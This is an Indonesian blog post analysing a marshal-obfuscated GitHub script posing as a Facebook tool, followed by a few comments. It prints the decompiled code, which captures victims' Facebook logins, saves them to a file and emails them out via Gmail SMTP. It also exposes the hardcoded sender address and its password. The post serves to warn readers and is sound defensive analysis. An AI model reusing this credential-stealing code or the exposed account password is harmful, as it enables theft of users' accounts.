Jadi ceritanya, sedang jalan-jalan di github dan menemukan repositori yang di dalamnya ada script terlihat aneh dan cenderung mencurigakan. Isinya seperti ini:

import marshal
exec(marshal.loads('c\x00\x00\x00 ... \t\x1c\x07\x01'))

Setelah di-unmarshal dan didekompilasi, maka bisa terlihat ada yang aneh di fungsi login():

def login():
    global log
    us = inputD('[?]Email/HP')
    pa = inputD('[?]Kata Sandi')
    tampil('\rh[*]Sedang Login....')
    buka('https://m.facebook.com')
    br.select_form(nr=0)
    br.form['email'] = us
    br.form['pass'] = pa
    br.submit()
    url = br.geturl()
    if 'save-device' in url or 'm_sess' in url:
        tampil('\rh[*]Login Berhasil')
        buka('https://mobile.facebook.com/home.php')
        nama = br.find_link(url_regex='logout.php').text
        nama = re.findall('\\((.*a?)\\)', nama)[0]
        tampil('\rh[*]Selamat datang \rk%s\n\rh[*]Semoga ini adalah hari keberuntungan mu....' % nama)
        log = 1
        z = open('log.txt', 'w')
        z.write('USERNAME : ')
        z.write(us)
        z.write('\n')
        z.write(' PASSWORD : ')
        z.write(pa)
        z.close()
        kirim()   #<<<---------- MENCURIGATION!
        hapus()

Ternyata pada fungsi login(), terdapat baris yang memanggil fungsi kirim(). Nah, fungsi kirim() itu sendiri, isinya seperti ini:

def kirim():
    email_user = 'lolriza798@gmail.com'
    email_password = 'Dogerr123'
    email_send = 'riza.yannaryu@gmail.com'
    subject = '=== KIRIMAN NYA KAK ==='
    msg = MIMEMultipart()
    msg['From'] = email_user
    msg['To'] = email_send
    msg['Subject'] = subject
    body = '====== AKUN FACEBOOK ======='
    msg.attach(MIMEText(body, 'plain'))
    filename = 'log.txt'
    attachment = open('log.txt', 'rb')
    part = MIMEBase('application', 'octet-stream')
    part.set_payload(attachment.read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', 'attachment; filename= ' + filename)
    msg.attach(part)
    text = msg.as_string()
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(email_user, email_password)
    server.sendmail(email_user, email_send, text)
    server.quit()

Ternyata, fungsi kirim ini akan mengirimkan file teks yang isinya username dan password ke alamat email lolriza798@gmail.com yang passwordnya Dogerr123. Saran saya, hati-hatilah kalau menggunakan source yang ada di github dan dalam bentuk yang tidak mudah dibaca. Sekian jurnal singkat kali ini. Terima kasih kepada Tuhan Yang Maha Esa, dan Anda yang telah membaca jurnal ini.

Yamaaf gan :v

Zen

Cara umarshall nya gmna ya gan? Boleh kasih tutorial nya?

Moral story, jangan asal clone, install, pip, go get, npm install, yarn install, dkk, kalau tidak paham apa isinya, gitu ya om 👍🍺

Benar sekali om :D